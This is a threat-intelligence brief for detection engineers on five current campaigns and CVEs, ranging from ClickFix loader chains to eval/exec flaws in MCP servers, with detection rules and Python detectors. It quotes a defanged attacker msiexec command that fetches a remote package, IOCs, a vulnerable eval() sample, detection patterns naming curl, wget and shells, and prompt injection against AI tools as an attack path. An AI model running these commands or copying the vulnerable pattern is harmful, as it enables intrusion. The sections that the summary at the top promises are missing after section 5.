Cyber Threat Brief — February 24, 2026
Window: February 23–24, 2026 | Audience: Detection Engineers
TL;DR: CrowdStrike drops its annual report (29-min breakout, AI at scale), Huntress dissects a ClickFix → Matanbuchus 3.0 → AstarionRAT pre-ransomware chain with 40-min DC compromise, Silver Fox abuses fake Huorong AV to drop ValleyRAT via DLL sideloading, APT28 weaponizes webhook URLs as Office macro C2, seven MCP servers get RCE CVEs from the same eval()/exec() root cause, Dragos names three new OT threat groups plus 3,300 industrial ransomware victims, and DFIR Report details an ActiveMQ exploit leading to LockBit deployment with a 90-minute final detection window.
1. CrowdStrike 2026 Global Threat Report: AI Is Both Weapon and Target
What’s New
CrowdStrike released its 2026 Global Threat Report today, tracking 280+ named adversaries in 2025. The headline numbers: eCrime average breakout time crashed to 29 minutes (fastest observed: 27 seconds), AI-enabled adversary activity surged 89% year-over-year, and 42% of vulnerabilities were weaponized before public disclosure.
Technical Details
| Field | Value |
|---|---|
| Adversaries tracked | 280+ named |
| Avg. eCrime breakout | 29 min (65% faster than 2024) |
| Fastest breakout | 27 seconds |
| Earliest exfil observed | 4 min post-access |
| AI-enabled activity increase | +89% YoY |
| Zero-days exploited pre-disclosure | 42% of total vulns |
| Cloud intrusions | +37% (state-nexus +266%) |
| China-nexus activity | +38%; logistics +85% |
| DPRK incidents | +130% (FAMOUS CHOLLIMA doubled) |
| Largest single heist | $1.46B crypto theft (PRESSURE CHOLLIMA) |
TTPs (Key Themes)
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566 – Phishing | Prompt injection into GenAI tools at 90+ orgs |
| Credential Access | T1110 – Brute Force | AI-generated scripts for credential dumping |
| Defense Evasion | T1070 – Indicator Removal | AI erasing forensic evidence (PUNK SPIDER) |
| Command & Control | T1071 – App Layer Proto | Malicious prompts via GenAI as C2 channel |
| Impact | T1486 – Data Encrypted | Pre-positioned cloud access → ransomware |
Detection Opportunities
- Prompt Injection: Monitor GenAI tool audit logs for anomalous system prompts requesting credential output or command execution
- AI Dev Platform Abuse: Baseline API usage from AI development tooling; alert on persistence mechanisms (scheduled tasks, cron) created from AI agent processes
- Sub-27-Second Breakout: Tune lateral movement detection for initial-to-pivot under 60 seconds; traditional 5-minute correlation windows miss this
- Cloud Targeting: Alert on new cross-cloud IAM role assumptions, especially by identities that haven’t previously accessed target accounts
Log Sources
- GenAI platform audit logs (OpenAI, Gemini, Copilot Enterprise)
- Cloud provider IAM event logs (CloudTrail, Azure Monitor, GCP Audit)
- EDR telemetry for sub-2-minute process chains
- Network: anomalous TLS connections from AI service processes
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — no GenAI abuse or 27-sec breakout rules |
| Splunk ESCU | ❌ Gap |
| Elastic | ✅ Partial — defense_evasion_genai_process_encoding_prior_to_network_activity.toml + 3 related GenAI rules |
Recommendation: Review Elastic’s GenAI detection rules as a starting baseline. AI platform audit logging is the critical gap — most orgs have it unconfigured.
Sources
2. ClickFix + Matanbuchus 3.0 + AstarionRAT: Pre-Ransomware Loader Chain
What’s New
Huntress documented a February 2026 intrusion where ClickFix delivered Matanbuchus 3.0 (a $10K–$15K/month MaaS loader), which staged a never-before-documented RAT (AstarionRAT) before the operator moved laterally to both domain controllers in under 40 minutes. This is the most technically detailed ClickFix-to-ransomware-precursor chain publicly documented to date, revealing 6+ layered stages.
Technical Details
| Field | Value |
|---|---|
| Initial vector | ClickFix social engineering |
| First stage | Silent MSI install (-PaCkAGe hxxp://binclloudapp[.]com/466943 /q) |
| Case mixing evasion | mSiexeC.EXe — mixed case to evade string-match rules |
| Loader | Matanbuchus 3.0 (complete rewrite; $10K/mo HTTPS, $15K/mo DNS) |
| Second RAT | AstarionRAT — 24 commands, RSA C2, SOCKS5, reflective loading |
| DLL Sideloading via | Zillya! Antivirus AVCore.exe → SystemStatus.dll (Matanbuchus) |
| Staging dir | C:\ProgramData\USOShared\ (mimics Windows Update) |
| Lateral movement | PsExec to 2 DCs within 40 min; rogue account creation |
| Defender evasion | Defender exclusions staged pre-movement |
| C2 masquerade | RSA-encrypted traffic disguised as application telemetry |
| Key IOCs | binclloudapp[.]com (reg. Feb 5), IP 192.121.23[.]146 (M247 EU AS9009) |
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1204.002 – User Execution: Malicious File | ClickFix clipboard paste → msiexec |
| Defense Evasion | T1036 – Masquerading | Mixed-case mSiexeC.EXe in command line |
| Defense Evasion | T1574.002 – DLL Side-Loading | AVCore.exe loads malicious SystemStatus.dll |
| Defense Evasion | T1562.001 – Disable/Modify Tools | Defender exclusion added for process + dir |
| Persistence | T1053.005 – Scheduled Task | Pre-staged in C:\ProgramData\USOShared\ |
| Credential Access | T1003 – OS Credential Dumping | AstarionRAT credential theft module |
| Lateral Movement | T1021.001 – RDP / T1569.002 – PsExec | Lateral to domain controllers |
| C2 | T1095 – Non-Application Layer Protocol | Custom Lua 5.4.7 interpreter + reflective PE loader |
Detection Opportunities
# Detect mixed-case msiexec with a /package or -package argument (case-insensitive match; the
# (?i) flag already covers case mixing, and a plain [/-] avoids requiring a literal backslash
# before the hyphen, which the per-character version did)
CommandLine|re: '(?i)msiexec.*[/-]package'
# Detect silent MSI install from new/untrusted domain
process.name = "msiexec.exe" AND
CommandLine CONTAINS "/q" AND
CommandLine MATCHES "hxxp://" AND
NOT (domain IN known_software_update_domains)
# Defender exclusion staging before lateral movement
process.name IN ("powershell.exe", "cmd.exe") AND
CommandLine CONTAINS ("Add-MpPreference" OR "Set-MpPreference") AND
CommandLine CONTAINS ("-ExclusionPath" OR "-ExclusionProcess") AND
NOT parent.name = "svchost.exe"
# AstarionRAT C2 - RSA-encrypted traffic disguised as telemetry
# Hunt for non-browser processes with high-entropy TLS to newly registered domains
# PsExec to multiple targets within 40 minutes
parent.name = "psexec.exe" AND
dest.is_domain_controller = true AND
count(unique dest) >= 2 WITHIN 40min
# USOShared staging directory abuse
file.path CONTAINS "C:\\ProgramData\\USOShared\\" AND
file.extension IN (".dll", ".exe") AND
NOT process.name IN ("usocoreworker.exe", "musnotification.exe")
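The rules above written out as runnable checks, as an added example (not code from Huntress or from this brief). It normalizes command lines before matching, so the mixed-case mSiexeC.EXe trick has no effect, and it flags Defender exclusions staged from a shell and PE drops into C:\ProgramData\USOShared by anything other than the Update Orchestrator. The event dicts are constructed Sysmon-style records (Image, ParentImage, CommandLine, TargetFilename); the allowlist of USOShared writers is an assumption to tune per environment.

```python
"""Added example, not from the Huntress report: stateless detections for the
msiexec -> Defender-exclusion -> USOShared staging steps, run over constructed
Sysmon-style events (EventID 1 = process create, EventID 11 = file create)."""
import re
from pathlib import PureWindowsPath

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mSiexeC.EXe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mSiexeC.EXe   -PaCkAGe hxxp://binclloudapp[.]com/466943 /q"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\Installer\1a2b.msi /qn"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -c Add-MpPreference -ExclusionPath C:\ProgramData\USOShared"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\ProgramData\USOShared\SystemStatus.dll"},
    {"EventID": 11, "Image": r"C:\Windows\System32\usocoreworker.exe",
     "TargetFilename": r"C:\ProgramData\USOShared\Logs\NotifyIcon.etl"},
]

# msiexec with a /package or -package argument pointing at a URL, run quietly.
MSIEXEC_URL_QUIET = re.compile(
    r"msiexec(?:\.exe)?\b.*[/-]package\s+(?:https?|hxxps?)://\S+.*\s[/-]q\b")
# Add-/Set-MpPreference creating an exclusion of any kind.
DEFENDER_EXCLUSION = re.compile(
    r"(?:add|set)-mppreference\b.*-exclusion(?:path|process|extension)\b")
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
USOSHARED = r"c:\programdata\usoshared"
# Assumed allowlist of Update Orchestrator binaries that legitimately write here.
USO_WRITERS = {"usocoreworker.exe", "musnotification.exe", "usoclient.exe"}
PE_EXTENSIONS = {".dll", ".exe"}


def normalize(command_line: str) -> str:
    """Lower-case and collapse whitespace so case mixing and padding cannot
    defeat string rules."""
    return re.sub(r"\s+", " ", command_line).strip().lower()


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule the event matches."""
    hits = []
    if event.get("EventID") == 1:
        cmd = normalize(event["CommandLine"])
        image = image_name(event["Image"])
        parent = image_name(event.get("ParentImage", ""))
        if image == "msiexec.exe" and MSIEXEC_URL_QUIET.search(cmd):
            hits.append("msiexec_silent_install_from_url")
        if image in SHELLS and DEFENDER_EXCLUSION.search(cmd) and parent != "svchost.exe":
            hits.append("defender_exclusion_staged")
    elif event.get("EventID") == 11:
        target = PureWindowsPath(event["TargetFilename"])
        if (str(target).lower().startswith(USOSHARED)
                and target.suffix.lower() in PE_EXTENSIONS
                and image_name(event["Image"]) not in USO_WRITERS):
            hits.append("usoshared_pe_drop")
    return hits


def run(events: list) -> dict:
    """Map rule name -> list of event indexes that triggered it."""
    triggered = {}
    for idx, event in enumerate(events):
        for rule in evaluate(event):
            triggered.setdefault(rule, []).append(idx)
    return triggered


if __name__ == "__main__":
    for rule, idxs in run(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idxs}")
```

The normalization step is the point: a rule that compares the raw CommandLine against "msiexec" misses the first event entirely, while the same rule over `normalize()` output fires. The second event (a local /qn install under svchost.exe) stays quiet, which is what keeps the rule usable on patch-management hosts.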
Log Sources
- Sysmon Events 1 (process creation), 7 (image load), 11 (file create), 12/13 (registry)
- Windows Security Event 4688 (process creation with command line)
- EDR telemetry (command-line visibility critical)
- Network: TLS fingerprinting for non-standard JA3 from msiexec.exe
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ ClickFix: proc_creation_win_susp_clickfix_filefix_execution.yml |
| Sigma | ✅ MSI network: net_connection_win_msiexec_http.yml |
| Sigma | ✅ DLL sideloading: image_load_side_load_from_non_system_location.yml |
| Sigma | ✅ PsExec: 36 existing rules |
| Sigma | ❌ Gap: Matanbuchus 3.0 loader specifics |
| Sigma | ❌ Gap: AstarionRAT C2 pattern (RSA telemetry masquerade) |
| Sigma | ❌ Gap: USOShared staging directory abuse |
| Splunk ESCU | ❌ Gap: Matanbuchus/AstarionRAT |
| Elastic | ❌ Gap |
Write this rule: Sigma for USOShared directory PE drops from non-Windows-Update processes. Also: msiexec mixed-case detection.
Sources
3. Silver Fox APT: Fake Huorong AV Site Delivers ValleyRAT/Winos4.0 via DLL Sideloading
What’s New
Silver Fox APT (Chinese-speaking) cloned the popular Huorong Security (火绒) antivirus website — registered huoronga[.]com — to deliver ValleyRAT, a modular RAT built on the Winos4.0 framework. Malwarebytes disclosed the full technical chain today. Key detection angle: WavesSvc64.exe with no audio stack loaded, scheduled task named “Batteries,” and Winos4.0 C2 at 161.248.87.250:443 using a custom non-TLS binary protocol.
Technical Details
| Field | Value |
|---|---|
| Attribution | Silver Fox APT (Chinese-speaking) |
| Delivery | Typosquatted site huoronga[.]com |
| Relay domain | hndqiuebgibuiwqdhr[.]cyou |
| Payload host | Cloudflare R2 (trusted CDN) |
| Archive | BR火绒445.zip |
| Installer type | NSIS (Nullsoft) — legitimate framework |
| Loader binary | WavesSvc64.exe (audio service masquerade) |
| DLL sideloaded | DuiLib_u.dll (hijacked DirectUI library) |
| Encrypted shellcode | box.ini |
| Persistence | Scheduled task “Batteries” (C:\Windows\Tasks\Batteries.job) |
| Registry C2 config | HKCU\SOFTWARE\IpDates_info (encoded domain) |
| C2 | yandibaiji0203[.]com + 161.248.87.250:443 (custom binary proto) |
| Defender bypass | PowerShell Add-MpPreference high-integrity exclusion for %APPDATA%\trvePath + WavesSvc64.exe |
| File refresh | Periodic delete-rewrite of DLLs to defeat hash-based detection |
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1192 – Spearphishing Link / T1036 – Masquerade | Typosquatted AV download site |
| Execution | T1204.002 – User Execution | NSIS installer mimics legitimate AV setup |
| Defense Evasion | T1574.002 – DLL Side-Loading | WavesSvc64.exe + DuiLib_u.dll in Temp |
| Defense Evasion | T1562.001 – Impair Defenses | High-integrity PowerShell Defender exclusion |
| Persistence | T1053.005 – Scheduled Task | Batteries.job at system startup |
| Persistence | T1547.001 – Registry Run Key | HKCU\SOFTWARE\IpDates_info C2 config |
| C2 | T1095 – Non-Standard Protocol | Custom binary over TCP/443 (not HTTPS) |
| Defense Evasion | T1070.004 – File Deletion | Periodic core file deletion + rewrite |
Detection Opportunities
# WavesSvc64.exe spawned from non-Waves parent (abnormal)
process.name = "WavesSvc64.exe" AND
NOT (parent.name IN ("services.exe", "svchost.exe") OR
file.path CONTAINS "Waves")
# rundll32.exe launched with no DLL,Export arguments
process.name = "rundll32.exe" AND
(CommandLine = "rundll32.exe" OR CommandLine = "rundll32")
# → ValleyRAT WinosStager plugin loading pattern
# Scheduled task named "Batteries" created by non-system process
EventID = 4698 AND
TaskName CONTAINS "Batteries" AND
NOT process.name IN ("svchost.exe", "taskeng.exe")
# IpDates_info registry key creation
TargetObject CONTAINS "IpDates_info"
# Defender exclusion from high-integrity non-system process
process.name IN ("powershell.exe") AND
CommandLine CONTAINS "Add-MpPreference" AND
IntegrityLevel = "High" AND
NOT (parent.name IN ("msiexec.exe", "setup.exe") AND
CodeSignature.Trusted = true)
# Heuristic: download ZIP from Cloudflare R2 → immediate NSIS extract → Waves audio binary
# Correlate: browser download → temp zip → WavesSvc64.exe in Temp within 60s
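The network angle in the Log Sources below, TCP to 443 without a TLS ClientHello, is the one check here that does not depend on a domain or hash and survives the malware's periodic file rewrites. As an added example (not code from Malwarebytes or from this brief), this validates the record and handshake headers of the first payload bytes of a flow and reports anything else on 443. The flow records and payloads are constructed; the binary sample is not a real Winos4.0 message.

```python
"""Added example, not from the Malwarebytes analysis: structural check that the
first bytes of a TCP/443 flow form a TLS ClientHello, so that a custom binary
protocol on 443 stands out.  Flow records and payloads below are constructed."""
import os

TLS_HANDSHAKE = 0x16
TLS_CLIENT_HELLO = 0x01
TLS_MINOR_VERSIONS = {0x00, 0x01, 0x02, 0x03, 0x04}  # SSL 3.0 .. TLS 1.3


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """Validate the record header and handshake header of a ClientHello that
    fits in one record.  Fragmented hellos would need reassembly first."""
    if len(payload) < 11:
        return False
    if payload[0] != TLS_HANDSHAKE or payload[1] != 0x03 or payload[2] not in TLS_MINOR_VERSIONS:
        return False
    record_len = int.from_bytes(payload[3:5], "big")
    if payload[5] != TLS_CLIENT_HELLO:
        return False
    handshake_len = int.from_bytes(payload[6:9], "big")
    if handshake_len + 4 != record_len:  # handshake header is 4 bytes
        return False
    # client_version inside the hello: 0x0303 for TLS 1.2 and the TLS 1.3 legacy value
    return payload[9] == 0x03 and payload[10] in TLS_MINOR_VERSIONS


def classify_flow(dst_port: int, first_bytes: bytes) -> str:
    """'tls' for a real ClientHello, 'non_tls_on_443' for anything else on 443
    (the hunt condition), 'other' for remaining ports."""
    if looks_like_tls_client_hello(first_bytes):
        return "tls"
    return "non_tls_on_443" if dst_port == 443 else "other"


def build_minimal_client_hello() -> bytes:
    """Constructed, minimal but well-formed TLS 1.2 ClientHello for testing."""
    body = (b"\x03\x03" + os.urandom(32)   # client_version + random
            + b"\x00"                      # session_id length 0
            + b"\x00\x02\xc0\x2f"          # one cipher suite (ECDHE-RSA-AES128-GCM-SHA256)
            + b"\x01\x00"                  # one compression method: null
            + b"\x00\x00")                 # no extensions
    handshake = bytes([TLS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + len(handshake).to_bytes(2, "big") + handshake


# Constructed flow records: (destination, port, first payload bytes).
SAMPLE_FLOWS = [
    ("cdn.example", 443, build_minimal_client_hello()),
    ("198.51.100.23", 443, bytes.fromhex("0000002a7f010000")),  # made-up binary framing
    ("198.51.100.23", 443, b"GET / HTTP/1.1\r\nHost: x\r\n"),   # plaintext on 443
    ("intranet.example", 80, b"GET / HTTP/1.1\r\n"),
]


def hunt(flows: list) -> list:
    """Return (destination, port) pairs talking something other than TLS on 443."""
    return [(dst, port) for dst, port, data in flows
            if classify_flow(port, data) == "non_tls_on_443"]


if __name__ == "__main__":
    for item in hunt(SAMPLE_FLOWS):
        print("non-TLS traffic on 443 to", item)
```

Run this over the first client-to-server payload of each flow (Zeek's `conn` plus a missing `ssl` log is the usual source); a host that repeatedly opens 443 without ever producing a parseable ClientHello is worth pairing with the WavesSvc64.exe process rules above.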
Log Sources
- Sysmon Event 1 (process creation with command line)
- Sysmon Event 12/13 (registry set — IpDates_info)
- Sysmon Event 11 (file creation in %TEMP%)
- Windows Security 4698 (scheduled task created)
- Network: DNS for yandibaiji0203[.]com; TCP to 161.248.87.250:443 with non-TLS ClientHello
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ DLL sideloading: image_load_side_load_from_non_system_location.yml |
| Sigma | ✅ Defender exclusion: multiple existing rules |
| Sigma | ✅ rundll32 no args: proc_creation_win_susp_bad_opsec_sacrificial_processes.yml |
| Sigma | ❌ Gap: ValleyRAT / Winos4.0 specific indicators |
| Sigma | ❌ Gap: Batteries.job scheduled task name |
| Sigma | ❌ Gap: IpDates_info registry key |
| Sigma | ❌ Gap: WavesSvc64.exe execution from non-Waves path |
| Splunk ESCU | ❌ Gap |
| Elastic | ❌ Gap |
High-value rule to write: Sigma for rundll32.exe with no arguments (ValleyRAT WinosStager injection pattern). Also: scheduled task name blocklist including “Batteries.”
Sources
4. APT28 Operation MacroMaze: Webhook URLs as Office Macro C2
What’s New
S2 Grupo’s LAB52 published an analysis of APT28’s “Operation MacroMaze” — a September 2025–January 2026 campaign targeting Western and Central European organizations using Office macros that POST data to legitimate webhook service URLs (Discord, Teams, workflow automation platforms) instead of attacker-controlled IPs. This bypasses IP reputation firewalls and forces defenders to look for behavioral signals: Office applications making outbound HTTP POST requests to webhook infrastructure.
Technical Details
| Field | Value |
|---|---|
| Attribution | APT28 (Fancy Bear / FANCY BEAR / Sofacy) |
| Campaign name | Operation MacroMaze |
| Activity period | September 2025 – January 2026 |
| Targets | Western and Central European entities |
| Initial vector | Spear phishing with weaponized Office docs (policy docs, invoices) |
| Macro action | VBA macro constructs HTTP POST to webhook URL |
| C2 channel | Legitimate webhook services (Discord webhooks, Teams incoming webhooks, automation platforms) |
| Data exfiltrated | System info, credentials — encoded in webhook payload body |
| Defense bypass | Traffic to legitimate domain IPs; no known-bad destination |
| Tooling | Standard Windows utilities + scripting — low footprint |
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1566.001 – Spearphishing Attachment | Office doc with VBA macro |
| Execution | T1204.002 – User Execution | User enables macro / MOTW bypassed |
| Execution | T1059.005 – Visual Basic | VBA macro constructs HTTP POST |
| Collection | T1119 – Automated Collection | System info, credential harvest |
| Exfiltration | T1041 – Exfiltration Over C2 | HTTP POST to webhook URL (encoded body) |
| C2 | T1102.002 – Bidirectional Communication via Web Service | Webhook receive instructions + exfil |
Detection Opportunities
# Office process making outbound HTTP/HTTPS POST to non-Microsoft domains
process.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE") AND
event.type = "network_connection" AND
DestinationPort IN (80, 443) AND
NOT (DestinationHostname ENDSWITH ".microsoft.com" OR
DestinationHostname ENDSWITH ".office.com" OR
DestinationHostname ENDSWITH ".office365.com")
# Known webhook provider domains accessed from Office apps
# (webhook.office.com is legitimate Teams infrastructure, but it is abused here)
DestinationHostname IN (
"discord.com", "discordapp.com",
"webhook.site", "hooks.zapier.com",
"webhook.office.com",
"pipedream.net", "make.com"
) AND
process.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE")
# VBA spawning child processes (ASR: Block Office apps from creating child processes)
parent.name IN ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE") AND
child.name IN ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# Encoded POST body heuristic
# Hunt for Base64-encoded strings in HTTP POST bodies from Office processes
# via proxy/web gateway inspection
KQL (Sentinel/Defender):
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE")
| where RemotePort in (80, 443)
| where RemoteUrl !contains "microsoft" and RemoteUrl !contains "office365"
| where RemoteUrl !contains "office.com"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
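Two caveats on the queries above, shown in code as an added example (not from LAB52 or this brief): `!contains "microsoft"` is a substring test, so any hostname with that string anywhere in it is excluded, and the `.office.com` exclusion hides webhook.office.com, the Teams incoming-webhook host named in this section. The version below compares whole DNS labels from the right and checks the webhook provider list before the vendor allowlist. The provider list is the one given above; the vendor suffixes and the sample connections are assumed.

```python
"""Added example, not from the LAB52 report: label-aware hostname matching for
the 'Office process -> webhook provider' rule, beside the substring logic from
the KQL above for comparison.  Sample connections are constructed."""

OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Webhook providers named in this section (webhook.office.com is Teams' own
# incoming-webhook host: legitimate, but still a C2-capable destination).
WEBHOOK_PROVIDERS = {"discord.com", "discordapp.com", "webhook.site",
                     "hooks.zapier.com", "webhook.office.com",
                     "pipedream.net", "make.com"}
# Assumed vendor suffixes that Office talks to normally.
VENDOR_SUFFIXES = {"microsoft.com", "office.com", "office365.com"}


def host_matches_suffix(host: str, suffix: str) -> bool:
    """True if host == suffix or host ends with '.' + suffix (label boundary)."""
    host, suffix = host.lower().rstrip("."), suffix.lower()
    return host == suffix or host.endswith("." + suffix)


def in_suffix_set(host: str, suffixes) -> bool:
    return any(host_matches_suffix(host, s) for s in suffixes)


def naive_is_vendor(host: str) -> bool:
    """The substring logic from the KQL above, kept only for comparison."""
    h = host.lower()
    return "microsoft" in h or "office365" in h or "office.com" in h


def classify(process: str, host: str) -> str:
    """'webhook_provider' is tested before the vendor allowlist, so Teams
    webhooks are not hidden by the office.com exclusion."""
    if process.lower() not in OFFICE_PROCESSES:
        return "not_office"
    if in_suffix_set(host, WEBHOOK_PROVIDERS):
        return "webhook_provider"
    if in_suffix_set(host, VENDOR_SUFFIXES):
        return "vendor_allowlisted"
    return "review"


# Constructed connection records: (process, destination hostname).
SAMPLE_CONNECTIONS = [
    ("WINWORD.EXE", "discord.com"),
    ("EXCEL.EXE", "webhook.office.com"),
    ("WINWORD.EXE", "login.microsoft.com"),
    ("WINWORD.EXE", "cdn-microsoft.example"),  # passes the substring test, not the label test
    ("outlook.exe", "discord.com"),
]


def triage(connections: list) -> dict:
    return {(p, h): classify(p, h) for p, h in connections}


if __name__ == "__main__":
    for key, verdict in triage(SAMPLE_CONNECTIONS).items():
        print(key, "->", verdict, "| substring vendor test:", naive_is_vendor(key[1]))
```

The fourth sample is the reason to prefer label matching: the substring check treats it as Microsoft traffic, the label check sends it to review. Order matters too; putting the vendor allowlist first would silently drop every Teams webhook POST.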
Log Sources
- Office 365 audit logs (macro execution events)
- Proxy/web gateway (HTTP POST from Office processes)
- Sysmon Event 3 (network connection from Office binaries)
- Windows Security Event 4688 (child processes spawned by Office)
- Defender ASR rule telemetry
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ✅ Partial — Office spawning child processes (multiple rules) |
| Sigma | ❌ Gap: Webhook domain outbound from Office process (specific webhook providers) |
| Splunk ESCU | ✅ Partial — Office macro network connection detection |
| Elastic | ❌ Gap: Webhook-specific Office C2 pattern |
Write this: Sigma rule for outbound connections to known webhook domains (Discord, webhook.site, Zapier) from Office application processes. This is a high-fidelity detection for this TTP.
Sources
5. Seven MCP Server RCEs: One eval()/exec() Root Cause
What’s New
Seven CVEs were published in February 2026 for MCP (Model Context Protocol) servers — all with the same root cause: user-controlled input reaching eval(), exec(), or equivalent dangerous functions without sanitization. Most servers are unauthenticated and network-exposed. The researcher (kai_security_ai) maintains a dataset of 554 network-exposed MCP servers, of which 37% have no authentication. This is the beginning of a disclosure wave, not the peak.
Technical Details
| CVE | Server | Vulnerable Function | Root Cause |
|---|---|---|---|
| CVE-2026-0755 | gemini-mcp-tool | execAsync | Shell metacharacter injection |
| CVE-2026-1977 | mcp-vegalite-server | eval(vegalite_specification) | Python eval on user input |
| CVE-2026-2008 | fermat-mcp | eqn_chart equations | Python eval on equation strings |
| CVE-2026-2131 | HarmonyOS-mcp-server | input_text | OS command injection |
| CVE-2026-2178 | xcode-mcp-server | run_lldb | Command injection in debugger |
| CVE-2026-25546 | godot-mcp | executeOperation projectPath | exec() with unsanitized path |
| CVE-2026-26029 | sf-mcp-server | child_process.exec | Shell injection in Salesforce MCP |
Attack chain: Prompt injection → MCP tool call → RCE on server host
Auth status: All unauthenticated or low-privilege at time of disclosure
Patch status: Most without patches at time of disclosure
Dataset: 554 network-exposed MCP servers; 37% no auth; ~15% have shell/exec tools
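The shared root cause, tool input reaching eval(), exec() or a shell, has a shared fix: give each kind of input a parser that cannot execute code. As an added example (not code from any of the affected servers or from this brief), the vulnerable pattern is shown once beside three hardened replacements matching the CVE table: a JSON parser for a chart specification, an AST walker that evaluates arithmetic and nothing else, and a path argument confined to a project root and passed to the child process as a single argv element with no shell. The helper names and the project root are assumptions.

```python
"""Added example, not code from the affected MCP servers: the eval()-on-tool-input
pattern behind the seven CVEs beside hardened replacements.  Helper names and
PROJECT_ROOT are assumed."""
import ast
import json
import operator
import posixpath


# --- Root-cause pattern (do not use): a tool handler feeding its argument to
# --- eval(), which runs arbitrary Python rather than decoding a data literal.
def parse_spec_unsafe(spec_text: str):
    return eval(spec_text)  # shown only as the vulnerable form; never called here


# --- Hardened: a data format gets a data parser.
def parse_spec(spec_text: str):
    """Return the decoded JSON object, or None if the text is not JSON."""
    try:
        return json.loads(spec_text)
    except ValueError:
        return None


# --- Hardened: arithmetic gets an AST walker with a fixed set of node types.
_BINARY = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}
_UNARY = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def evaluate_equation(expr: str, variables=None):
    """Evaluate + - * / over numbers and supplied variables; None for anything
    else (calls, attributes, subscripts, unknown names, syntax errors)."""
    variables = variables or {}

    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.Name) and node.id in variables:
            return variables[node.id]
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY:
            return _BINARY[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY:
            return _UNARY[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    try:
        return walk(ast.parse(expr, mode="eval").body)
    except (ValueError, SyntaxError, ZeroDivisionError):
        return None


# --- Hardened: a path argument is confined to the project root and handed to
# --- the child process as one argv element, never through a shell.
PROJECT_ROOT = "/srv/projects"  # assumed


def confine_path(user_path: str, root: str = PROJECT_ROOT):
    """Normalise and require the result to stay under root; None otherwise."""
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
        return candidate
    return None


def build_argv(user_path: str):
    """argv list for subprocess.run(argv, shell=False); shell metacharacters in
    the path are inert because no shell ever parses the list."""
    confined = confine_path(user_path)
    return None if confined is None else ["project-tool", "--path", confined]


if __name__ == "__main__":
    print(parse_spec('{"mark": "bar"}'))
    print(evaluate_equation("2*x + 1", {"x": 3}))
    print(build_argv("demo"), build_argv("../../etc"))
```

The AST walker is the replacement for `eval(equation_string)`: it returns None for a call, an attribute lookup or an unknown name instead of executing it, and division by zero is handled as bad input rather than a crash. The argv builder is the replacement for `child_process.exec`-style string commands: the path is validated, then passed as data.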
TTPs
| Tactic | Technique | Observable |
|---|---|---|
| Initial Access | T1190 – Exploit Public-Facing App | Unauthenticated MCP tool call |
| Execution | T1059 – Command and Scripting | OS command via eval/exec injection |
| Collection | T1119 – Automated Collection | AI agent data via compromised MCP server |
| Lateral Movement | T1021 – Remote Services | MCP server as pivot point in agent environment |
Detection Opportunities
# Network: MCP server processes making unexpected outbound connections
# (MCP servers should only respond, not initiate)
process.name IN ("node", "python", "python3") AND
event.type = "outbound_network" AND
DestinationPort NOT IN (443, 80) AND
NOT DestinationHostname IN (known_mcp_endpoints)
# Shell metacharacter patterns in MCP tool arguments
# Look for: ; | & ` $() in tool call parameters logged by MCP framework
# This requires MCP server-level audit logging (currently rare)
# Behavioral: unexpected child process from MCP server process
parent.name IN ("node", "python3") AND
parent.cmdline CONTAINS ("mcp", "server") AND
child.name IN ("sh", "bash", "cmd.exe", "powershell.exe", "curl", "wget")
# File system: unexpected writes from AI agent process
process.name IN ("node", "python3") AND
event.type = "file_create" AND
file.path NOT IN (mcp_server_working_dirs)
Audit step: Run the following to enumerate MCP servers in your environment:
# Find network-exposed MCP servers
ss -tlnp | grep -E ':(3000|8080|8000|9000)' | grep node
ps aux | grep -i "mcp\|model.context"
# Check for no-auth MCP servers
curl -s http://localhost:3000/mcp/health 2>/dev/null
Log Sources
- Process creation logs (parent-child chains from node/python)
- Network connection logs (unexpected egress from MCP server processes)
- MCP server audit logs (if configured — most aren’t)
- Application logs for eval()/exec() call patterns
Detection Coverage
| Source | Status |
|---|---|
| Sigma | ❌ Gap — No MCP-specific detection rules exist |
